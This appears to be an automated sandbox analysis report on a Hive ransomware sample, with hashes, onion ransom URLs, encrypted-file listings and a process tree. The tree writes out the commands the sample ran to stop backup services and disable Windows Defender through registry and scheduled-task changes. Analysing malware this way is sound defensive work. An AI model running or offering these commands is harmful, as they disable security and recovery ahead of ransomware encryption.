Analysis

max time kernel: 190s
max time network: 190s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 19:09

Static task: static1
Behavioral task: behavioral1
Sample: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
Resource: win7-en-20211208
General

Target: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
Size: 2.7MB
MD5: 524065ad3f33adcf7784f997d1089af4
SHA1: 754e4389ce52c20629154313a8f19251b05f7e75
SHA256: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de
SHA512: 87e52e975aafcb2256f8fb9aa10afbd78f70cdf0ccb399573087bc88044e289ac87678fcce34e29eb5af847ba910d29e3d5f4f72259ffe5e4e8cfce63b6ee69a
Malware Config

Extracted from: C:\4a7Z_HOW_TO_DECRYPT.txt
Family: hive
URLs:
- http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
- http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes:
    pid 900   MpCmdRun.exe

- Hive
  A ransomware written in Golang first seen in June 2021.

- Modifies security service (2 TTPs, 1 IoC)
  Processes:
    description: Set value (int)   ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"   process: reg.exe

- Clears Windows event logs (1 TTP)

- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes:
    pid 2336  bcdedit.exe
    pid 4056  bcdedit.exe

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Drops file in Program Files directory (64 IoCs)
  Processes: every entry below was performed by fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
    File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-400.png
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Ujwl9iHmxUY0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_rofJqU4pChc0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_eBOY3RO53TU0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\WideTile.scale-200.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\LargeLogo.scale-150_contrast-black.png
    File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\de-DE\msaddsr.dll.mui
    File opened for modification  C:\Program Files\7-Zip\Lang\be.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_p_hMd8bINYQ0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl64.dlla.manifest.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_2bS6xc-Zhtk0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-32_altform-unplated.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\br_16x11.png
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_KZjNKXMH__k0.7vilx
    File created                  C:\Program Files\Mozilla Firefox\defaults\pref\4a7Z_HOW_TO_DECRYPT.txt
    File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\4a7Z_HOW_TO_DECRYPT.txt
    File opened for modification  C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_8I_z7LzPC480.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-unplated.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\en-US\tokens_enUS.xml
    File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailLargeTile.scale-200.png
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_-SmSuwfIZ7o0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_FNpwLpapTCE0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\mask_corners.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\kr_60x42.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionSmallTile.scale-100.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-colorize.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-200_contrast-white.png
    File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\es-ES\msdaremr.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_a_yF1vnNIo40.7vilx
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_t39-2RvCNxQ0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\173.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_11c.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-100.png
    File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\4a7Z_HOW_TO_DECRYPT.txt
    File opened for modification  C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_lme3EMl7dEk0.7vilx
    File created                  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\4a7Z_HOW_TO_DECRYPT.txt
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_tZSrHbt0DTQ0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\150.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_jm-jo4GFGZE0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\gp_16x11.png
    File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6767_32x32x32.png
    File opened for modification  C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_BeforeEach_AfterEach.help.txt
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_P4yKFt4WcYo0.7vilx
    File opened for modification  C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_9_-e26i7bQc0.7vilx
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\jre\lib\net.properties.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Z1McZNKVXJ00.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13d.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2653_20x20x32.png
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_4AY-Bf2BbW40.7vilx
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_89vc6G0I_Ak0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_1mLJF-BP-z80.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.GrayF@2x.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_OnzH7VrFjMw0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\MedTile.scale-200.png
    File opened for modification  C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_T1x81R8qVuw0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\1.rsrc
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_contrast-white.png
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_dRrLmyzYvnY0.7vilx
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_3N9y7QZJV2U0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12h.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-200.png
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Road.png
    File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcor.dll.mui
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_s3nX6rd4P2c0.7vilx
    File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16_altform-unplated.png
    File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\en-GB.mail.config
    File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Pgf5JfxbUZ40.7vilx
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid 1160  vssadmin.exe

- Modifies registry class (3 IoCs)
  Processes:
    description: Key deleted   ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP   process: reg.exe
    description: Key deleted   ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP   process: reg.exe
    description: Key deleted   ioc: \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP   process: reg.exe

- Opens file in notepad (likely ransom note) (1 IoC)
  Processes:
    pid 2436  notepad.exe

- Runs net.exe

- Runs ping.exe (1 TTP, 1 IoC)

- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
    pid 3652  powershell.exe  (3 entries)
    pid 1112  powershell.exe  (3 entries)
    pid 1276  fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe  (2 entries)

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (tokens listed per process, in the order the report shows them):
    wevtutil.exe (pid 2800): SeSecurityPrivilege, SeBackupPrivilege
    wevtutil.exe (pid 2212): SeSecurityPrivilege, SeBackupPrivilege
    wevtutil.exe (pid 736): SeSecurityPrivilege, SeBackupPrivilege
    wmic.exe (pid 1820): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    wmic.exe (pid 2228): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    wmic.exe (pid 2228, second run of adjustments): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege

- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid / process wrote to target pid / process; every event below is logged twice in the report):
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 2312 net.exe
    2312 net.exe -> 924 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 504 net.exe
    504 net.exe -> 2080 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 4064 net.exe
    4064 net.exe -> 4020 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1020 net.exe
    1020 net.exe -> 776 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1864 net.exe
    1864 net.exe -> 2380 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 2840 net.exe
    2840 net.exe -> 608 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1200 net.exe
    1200 net.exe -> 2716 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 688 net.exe
    688 net.exe -> 1580 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 916 net.exe
    916 net.exe -> 2440 net1.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1428 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1452 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1584 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 2120 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3180 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3272 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 2868 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3292 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 1836 sc.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 320 reg.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3480 reg.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3188 reg.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3212 reg.exe
    1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -> 3776 reg.exe
Processes (indentation shows parent/child nesting; each entry gives the image path, the command line, the PID, and any signatures the report attached to that process)

[1] C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
    PID: 1276
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SamSs" /y
      PID: 2312
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
        PID: 924

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SDRSVC" /y
      PID: 504
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
        PID: 2080

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SstpSvc" /y
      PID: 4064
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
        PID: 4020

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UI0Detect" /y
      PID: 1020
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
        PID: 776

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "vmicvss" /y
      PID: 1864
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
        PID: 2380

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "VSS" /y
      PID: 2840
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y
        PID: 608

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "wbengine" /y
      PID: 1200
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
        PID: 2716

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "WebClient" /y
      PID: 688
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
        PID: 1580

  [2] C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UnistoreSvc_12a5d" /y
      PID: 916
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y
        PID: 2440

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
      PID: 1428

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
      PID: 1452

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
      PID: 1584

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
      PID: 2120

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "vmicvss" start= disabled
      PID: 3180

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "VSS" start= disabled
      PID: 3272

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
      PID: 2868

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "WebClient" start= disabled
      PID: 3292

  [2] C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UnistoreSvc_12a5d" start= disabled
      PID: 1836

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID: 320

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      PID: 3480

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      PID: 3188

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      PID: 3212

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      PID: 3776

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      PID: 1988

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      PID: 1440

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      PID: 820

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      PID: 1992

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      PID: 4040

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      PID: 4044

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      PID: 3216

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      PID: 2740

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      PID: 8

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID: 2616

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID: 2680

  [2] C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      PID: 3672

  [2] C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      PID: 1272

  [2] C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      PID: 1056

  [2] C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      PID: 2328

  [2] C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      PID: 1920

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      PID: 772

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      PID: 2304

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      PID: 2956

  [2] C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:3396 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1672 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2784 -
